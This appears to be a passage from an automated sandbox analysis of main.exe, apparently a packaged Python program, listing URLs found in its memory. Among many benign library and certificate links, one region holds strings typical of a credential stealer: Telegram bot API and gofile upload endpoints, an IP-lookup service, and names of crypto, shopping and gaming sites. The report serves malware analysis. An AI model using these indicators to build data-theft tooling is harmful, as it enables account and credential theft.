00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
Source: main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
Source: main.exe, 00000002.00000002.2026258242.000001E894E70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/library/itertools.html#recipes
Source: main.exe, 00000002.00000003.1972543562.000001E893395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://docs.python.org/library/unittest.html
Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://github.com/ActiveState/appdirs
Source: main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002633127.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023486431.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011999083.000001E894703000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023563231.000001E89472A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://mail.python.org/pipermail/python-dev/2012-June/120787.html.
Source: main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es
Source: main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es-
Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: main.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997567755.000001E89391F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002779411.000001E894609000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: main.exe, 00000002.00000003.1997567755.000001E89391F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/3
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/p
Source: main.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/z
Source: main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://stackoverflow.com/questions/19622133/
Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://timgolden.me.uk/python/wmi.html
Source: main.exe, 00000002.00000003.1972023696.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972808038.000001E894636000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023049314.000001E894657000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979469125.000001E894657000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976470167.000001E89464B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003095511.000001E89483F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006040169.000001E894657000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006291215.000001E894846000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: main.exe, 00000002.00000002.2025105777.000001E894A56000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980229397.000001E894A53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: main.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: main.exe, 00000002.00000003.1972971253.000001E894B59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B97000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995890221.000001E894B91000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001942358.000001E894B96000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994813697.000001E894B65000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988603631.000001E894B5A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2000928411.000001E894B94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: main.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: main.exe, 00000002.00000002.2024665951.000001E8948AE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979213831.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014212164.000001E8948A4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974002710.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8948A2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: main.exe, 00000002.00000003.1972023696.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008768260.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014545215.000001E894834000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024403480.000001E89483A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/oX
Source: main.exe, 00000002.00000003.1785741511.000001E89399B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: main.exe, 00000002.00000003.1999083048.000001E894B30000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996121577.000001E894BD2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995247587.000001E894B2C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025577227.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998028650.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986551166.000001E894BCF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: main.exe, 00000002.00000003.1998028650.000001E894BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dabeaz.com/ply)F
Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: main.exe, 00000002.00000003.1972023696.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008768260.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014545215.000001E894834000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025023723.000001E894A33000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024403480.000001E89483A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987274468.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: main.exe, 00000002.00000002.2023726848.000001E894776000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981062984.000001E894776000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opensource.org/licenses/mit-license.phptrols
Source: main.exe, 00000002.00000003.1785741511.000001E89399B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: main.exe, 00000002.00000003.1979273332.000001E894862000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: main.exe, 00000002.00000003.1973010642.000001E893B75000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994855674.000001E893BCE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973747012.000001E893B97000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980969299.000001E893BCC000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893BBE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020621648.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997639786.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974563806.000001E893BAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: main.exe, 00000002.00000003.1972971253.000001E894B59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2003795429.000001E894B97000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995890221.000001E894B91000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001942358.000001E894B96000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1994813697.000001E894B65000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1988603631.000001E894B5A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2000928411.000001E894B94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999790969.000001E893AD7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981303330.000001E893A9B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997398066.000001E893A9D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999906974.000001E893ADF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979378962.000001E893A63000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986060081.000001E893A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022722269.000001E894613000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002779411.000001E894613000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999364287.000001E894613000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aliexpress.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/servers
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/botp
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://binance.com)
Source: main.exe, 00000002.00000002.2021777975.000001E894070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue44497.
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://coinbase.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crunchyroll.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com)
Source: main.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.gg/pallets
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://disney.com)
Source: main.exe, 00000002.00000003.2008146184.000001E8936B4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981959975.000001E89369F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793761731.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793152862.000001E893A07000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981084453.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982725593.000001E8936B3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976651882.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981251684.000001E893699000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982367230.000001E8936A6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1789469075.000001E893698000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787609743.000001E893698000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: main.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
